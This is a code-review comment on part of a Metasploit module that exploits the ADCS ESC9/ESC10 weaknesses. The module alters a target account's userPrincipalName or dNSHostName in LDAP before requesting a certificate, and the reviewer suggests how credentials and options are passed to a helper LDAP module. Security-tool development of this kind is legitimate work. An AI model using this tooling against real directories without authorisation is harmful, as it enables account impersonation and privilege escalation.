modules/auxiliary/admin/dcerpc/esc_update_ldap_object.rb

```diff
@@ -0,0 +1,148 @@
+          'Oliver Lyak', # certipy implementation
+          'Spencer McIntyre', # icpr_cert module implementation
+          'jheysel-r7' # module implementation
+        ],
+        'References' => [
+          [ 'URL', 'https://github.com/GhostPack/Certify' ],
+          [ 'URL', 'https://github.com/ly4k/Certipy' ],
+          [ 'URL', 'https://medium.com/@offsecdeer/adcs-exploitation-series-part-2-certificate-mapping-esc15-6e19a6037760' ]
+        ],
+        'Notes' => {
+          'Reliability' => [],
+          'Stability' => [],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'AKA' => [ 'ESC9', 'ESC10' ]
+        },
+        'Actions' => [
+          [ 'REQUEST_CERT', { 'Description' => 'Request a certificate' } ]
+        ],
+        'DefaultAction' => 'REQUEST_CERT'
+      )
+    )
+
+    register_options([
+      OptEnum.new('UPDATE_LDAP_OBJECT', [ true, 'Either userPrincipalName or dNSHostName, Updates the necessary object of a specific user before requesting the cert. Used to exploit ESC9 and ESC10. ', 'userPrincipalName', %w[userPrincipalName dNSHostName] ]),
+      OptString.new('TARGET_USERNAME', [true, 'The username of the target LDAP object.']),
+      OptString.new('NEW_VALUE', [true, 'The new value for the specified attribute.']),
+    ])
+
+    register_advanced_options(
+      [
+        OptString.new('BASE_DN', [false, 'LDAP base DN if you already have it']),
+        OptInt.new('LDAPRport', [false, 'The target LDAP port.', 389]),
+      ]
+    )
+  end
+
+  def run
+    send("action_#{action.name.downcase}")
+  rescue MsIcprConnectionError, SmbIpcConnectionError => e
+    fail_with(Failure::Unreachable, e.message)
+  rescue MsIcprAuthenticationError, MsIcprAuthorizationError, SmbIpcAuthenticationError => e
+    fail_with(Failure::NoAccess, e.message)
+  rescue MsIcprNotFoundError => e
+    fail_with(Failure::NotFound, e.message)
+  rescue MsIcprUnexpectedReplyError => e
+    fail_with(Failure::UnexpectedReply, e.message)
+  rescue MsIcprUnknownError => e
+    fail_with(Failure::Unknown, e.message)
+  end
+
+  def call_ldap_object_module(action, value = nil)
+    mod_refname = 'auxiliary/gather/ldap_object_attribute'
+
+    print_status("Loading #{mod_refname}")
+    ldap_update_module = framework.modules.create(mod_refname)
+
+    unless ldap_update_module
+      print_error("Failed to load module: #{mod_refname}")
+      return
+    end
+
+    # Default to using the SMB credentials if LDAP credentials are not provided
+    ldap_update_module = framework.modules.create(mod_refname)
+    ldap_update_module.datastore['RHOST'] = datastore['RHOST']
+    ldap_update_module.datastore['RPORT'] = datastore['LDAPRport']
+    ldap_update_module.datastore['LDAPDomain'] = datastore['SMBDomain'] || datastore['LDAPDomain']
+    ldap_update_module.datastore['LDAPUsername'] = datastore['SMBUser'] || datastore['LDAPUsername']
+    ldap_update_module.datastore['LDAPPassword'] = datastore['SMBPass'] || datastore['LDAPPassword']
```

Comment:
In the event that different SMB and LDAP credentials are in use, we'd want to use the LDAP ones here for the LDAP module instead of the SMB set. I would also forward the `VERBOSE` option for extra details. Also `BASE_DN` is used by the LDAP module so it should be forwarded too.

```suggestion
    ldap_update_module.datastore['BASE_DN'] = datastore['BASE_DN']
    ldap_update_module.datastore['VERBOSE'] = datastore['VERBOSE']
    ldap_update_module.datastore['LDAPDomain'] = datastore['LDAPDomain'] || datastore['SMBDomain']
    ldap_update_module.datastore['LDAPUsername'] = datastore['LDAPUsername'] || datastore['SMBUser']
    ldap_update_module.datastore['LDAPPassword'] = datastore['LDAPPassword'] || datastore['SMBPass']
```